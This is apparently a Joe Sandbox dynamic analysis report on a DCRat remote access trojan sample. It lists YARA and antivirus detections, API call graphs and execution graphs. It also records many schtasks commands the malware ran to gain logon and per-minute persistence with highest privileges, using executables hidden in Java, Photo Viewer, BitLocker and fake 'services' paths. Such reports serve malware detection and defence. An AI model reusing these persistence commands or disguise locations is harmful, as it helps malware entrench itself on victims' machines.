            MD5 hash:EF0F547DFEF34380202700FDEDDC1CC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1917392588.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1917392588.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 88%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:10
            Start time:20:57:19
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:11
            Start time:20:57:19
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:12
            Start time:20:57:19
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:13
            Start time:20:57:19
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 7 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:14
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:15
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:16
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:17
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:18
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:19
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:20
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:21
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:22
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:23
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:24
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:25
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Browserfont\services.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:26
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:27
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:28
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:29
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:30
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:32
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:33
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:34
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:35
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:36
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:37
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:38
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            Imagebase:0x4b0000
            File size:847'360 bytes
            MD5 hash:EF0F547DFEF34380202700FDEDDC1CC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2048959997.0000000002721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 88%, ReversingLabs
            Has exited:true

            Target ID:39
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:40
            Start time:20:57:22
            Start date:30/05/2024
            Path:C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            Imagebase:0xa10000
            File size:847'360 bytes
            MD5 hash:EF0F547DFEF34380202700FDEDDC1CC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:false

            Target ID:41
            Start time:20:57:22
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:84.6%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:40%
              Total number of Nodes:5
              Total number of Limit Nodes:1

              Callgraph

              • Executed
              • Not Executed
              • Opacity -> Relevance
              • Disassembly available
              callgraph 0 Function_00401000 1 Function_00401AD8 1->0

              Control-flow Graph

              APIs
              • GetCommandLineA.KERNEL32 ref: 00401AD8
              • GetModuleHandleA.KERNEL32(00000000), ref: 00401AE4
              • GetProcessHeap.KERNEL32(00000000), ref: 00401AEE
                • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
              • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
              Memory Dump Source
              • Source File: 00000000.00000002.1750986638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1750920175.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751045953.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751095239.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751095239.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751095239.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751408463.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751408463.0000000000E11000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1755166666.000000000112C000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_RFAwChXSve.jbxd
              Similarity
              • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
              • String ID:
              • API String ID: 673778540-0
              • Opcode ID: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
              • Instruction ID: 8dce49216dd7d9d4199a49ca56cfbc69a4ccef7545e9a5bd4d655d6bb2b69eda
              • Opcode Fuzzy Hash: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
              • Instruction Fuzzy Hash: 50E06774A45300AAE7217F71AE02B193E75A74174AF00007BB601791F6EBB86A109B5D

              Control-flow Graph

              APIs
              • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
              • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
              • RegisterClassExA.USER32(00000030), ref: 0040106E
              • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
              • ShowWindow.USER32(00000001,?), ref: 004010BC
              • UpdateWindow.USER32(00000001), ref: 004010C7
              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
              • TranslateMessage.USER32(?), ref: 004010E4
              • DispatchMessageA.USER32(?), ref: 004010ED
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1750986638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.1750920175.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751045953.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751095239.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751095239.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751095239.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751408463.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1751408463.0000000000E11000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1755166666.000000000112C000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_RFAwChXSve.jbxd
              Similarity
              • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
              • String ID: 0$WinClass32
              • API String ID: 282685165-2329282442
              • Opcode ID: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
              • Instruction ID: 47d6b7d35728adeecb0fde599aadb8774aba34f0bad3284053c57367e6fa7a97
              • Opcode Fuzzy Hash: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
              • Instruction Fuzzy Hash: 7D210C70D41249AAEF10EFD0CC46BDDBFB8AB04708F20802AF200BA1E5D7B96655DB5C

              Execution Graph

              Execution Coverage:8.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:4.2%
              Total number of Nodes:502
              Total number of Limit Nodes:9
              execution_graph 2886 9fb79f 2887 9fb6db 45 API calls 2886->2887 2888 9fb7ae 2887->2888 2889 9fb7bc 11 API calls 2888->2889 2890 9fb7bb 2889->2890 2283 a05504 2284 a05510 ___free_lconv_mon 2283->2284 2285 a05524 2284->2285 2286 a05517 GetLastError ExitThread 2284->2286 2297 a19d54 GetLastError 2285->2297 2292 a05540 2329 a056e3 2292->2329 2298 a19d6a 2297->2298 2301 a19d70 2297->2301 2339 a1a8a1 2298->2339 2303 a19d74 SetLastError 2301->2303 2344 a1a8e0 2301->2344 2307 a05529 2303->2307 2308 a19e09 2303->2308 2324 a1ccb1 2307->2324 2367 a053c6 2308->2367 2309 a19da9 2312 a1a8e0 ___free_lconv_mon 6 API calls 2309->2312 2310 a19dba 2313 a1a8e0 ___free_lconv_mon 6 API calls 2310->2313 2315 a19db7 2312->2315 2316 a19dc6 2313->2316 2314 a19e0e 2356 a199dc 2315->2356 2317 a19de1 2316->2317 2318 a19dca 2316->2318 2362 a19b82 2317->2362 2319 a1a8e0 ___free_lconv_mon 6 API calls 2318->2319 2319->2315 2323 a199dc ___free_lconv_mon 14 API calls 2323->2303 2325 a1ccc3 GetPEB 2324->2325 2326 a05534 2324->2326 2325->2326 2327 a1ccd6 2325->2327 2326->2292 2336 a1ab89 2326->2336 2854 a1a713 2327->2854 2857 a055b9 2329->2857 2337 a1a650 ___free_lconv_mon 5 API calls 2336->2337 2338 a1aba5 2337->2338 2338->2292 2385 a1a650 2339->2385 2342 a1a8c6 2342->2301 2343 a1a8d8 TlsGetValue 2345 a1a650 ___free_lconv_mon 5 API calls 2344->2345 2346 a1a8fc 2345->2346 2347 a19d8c 2346->2347 2348 a1a91a TlsSetValue 2346->2348 2347->2303 2349 a1a29b 2347->2349 2354 a1a2a8 ___free_lconv_mon 2349->2354 2350 a1a2e8 2403 a0424a 2350->2403 2351 a1a2d3 RtlAllocateHeap 2353 a19da1 2351->2353 2351->2354 2353->2309 2353->2310 2354->2350 2354->2351 2400 a20a25 2354->2400 2357 a19a11 2356->2357 2358 a199e7 RtlFreeHeap 2356->2358 2357->2303 2358->2357 2359 a199fc GetLastError 2358->2359 2360 a19a09 ___free_lconv_mon 2359->2360 2361 a0424a ___free_lconv_mon 12 API calls 2360->2361 2361->2357 2440 a19a16 2362->2440 2582 a13530 2367->2582 2370 a053d6 2372 a053e0 IsProcessorFeaturePresent 2370->2372 2373 a053ff 2370->2373 2375 a053ec 2372->2375 2633 a141bd 2373->2633 2627 9fb593 2375->2627 2378 a05419 2379 a0424a ___free_lconv_mon 14 API calls 2378->2379 2380 a0541e 2379->2380 2636 9fb78f 2380->2636 2382 a05430 2383 a05429 2382->2383 2639 a151d2 2382->2639 2383->2314 2386 a1a67e 2385->2386 2391 a1a67a 2385->2391 2386->2391 2392 a1a585 2386->2392 2389 a1a698 GetProcAddress 2390 a1a6a8 ___free_lconv_mon 2389->2390 2389->2391 2390->2391 2391->2342 2391->2343 2398 a1a596 ___free_lconv_mon 2392->2398 2393 a1a62c 2393->2389 2393->2391 2394 a1a5b4 LoadLibraryExW 2395 a1a633 2394->2395 2396 a1a5cf GetLastError 2394->2396 2395->2393 2397 a1a645 FreeLibrary 2395->2397 2396->2398 2397->2393 2398->2393 2398->2394 2399 a1a602 LoadLibraryExW 2398->2399 2399->2395 2399->2398 2406 a20a52 2400->2406 2417 a19ea5 GetLastError 2403->2417 2405 a0424f 2405->2353 2407 a20a5e ___free_lconv_mon 2406->2407 2412 a1738d EnterCriticalSection 2407->2412 2409 a20a69 2413 a20aa5 2409->2413 2412->2409 2416 a173d5 LeaveCriticalSection 2413->2416 2415 a20a30 2415->2354 2416->2415 2418 a19ec1 2417->2418 2419 a19ebb 2417->2419 2421 a1a8e0 ___free_lconv_mon 6 API calls 2418->2421 2423 a19ec5 SetLastError 2418->2423 2420 a1a8a1 ___free_lconv_mon 6 API calls 2419->2420 2420->2418 2422 a19edd 2421->2422 2422->2423 2425 a1a29b ___free_lconv_mon 12 API calls 2422->2425 2423->2405 2426 a19ef2 2425->2426 2427 a19f0b 2426->2427 2428 a19efa 2426->2428 2430 a1a8e0 ___free_lconv_mon 6 API calls 2427->2430 2429 a1a8e0 ___free_lconv_mon 6 API calls 2428->2429 2431 a19f08 2429->2431 2432 a19f17 2430->2432 2437 a199dc ___free_lconv_mon 12 API calls 2431->2437 2433 a19f32 2432->2433 2434 a19f1b 2432->2434 2435 a19b82 ___free_lconv_mon 12 API calls 2433->2435 2436 a1a8e0 ___free_lconv_mon 6 API calls 2434->2436 2438 a19f3d 2435->2438 2436->2431 2437->2423 2439 a199dc ___free_lconv_mon 12 API calls 2438->2439 2439->2423 2441 a19a22 ___free_lconv_mon 2440->2441 2454 a1738d EnterCriticalSection 2441->2454 2443 a19a2c 2455 a19a5c 2443->2455 2446 a19b28 2447 a19b34 ___free_lconv_mon 2446->2447 2459 a1738d EnterCriticalSection 2447->2459 2449 a19b3e 2460 a19d09 2449->2460 2451 a19b56 2464 a19b76 2451->2464 2454->2443 2458 a173d5 LeaveCriticalSection 2455->2458 2457 a19a4a 2457->2446 2458->2457 2459->2449 2461 a19d3f ___free_lconv_mon 2460->2461 2462 a19d18 ___free_lconv_mon 2460->2462 2461->2451 2462->2461 2467 a218b3 2462->2467 2581 a173d5 LeaveCriticalSection 2464->2581 2466 a19b64 2466->2323 2469 a21933 2467->2469 2470 a218c9 2467->2470 2471 a199dc ___free_lconv_mon 14 API calls 2469->2471 2493 a21981 2469->2493 2470->2469 2474 a218fc 2470->2474 2477 a199dc ___free_lconv_mon 14 API calls 2470->2477 2472 a21955 2471->2472 2475 a199dc ___free_lconv_mon 14 API calls 2472->2475 2473 a2191e 2476 a199dc ___free_lconv_mon 14 API calls 2473->2476 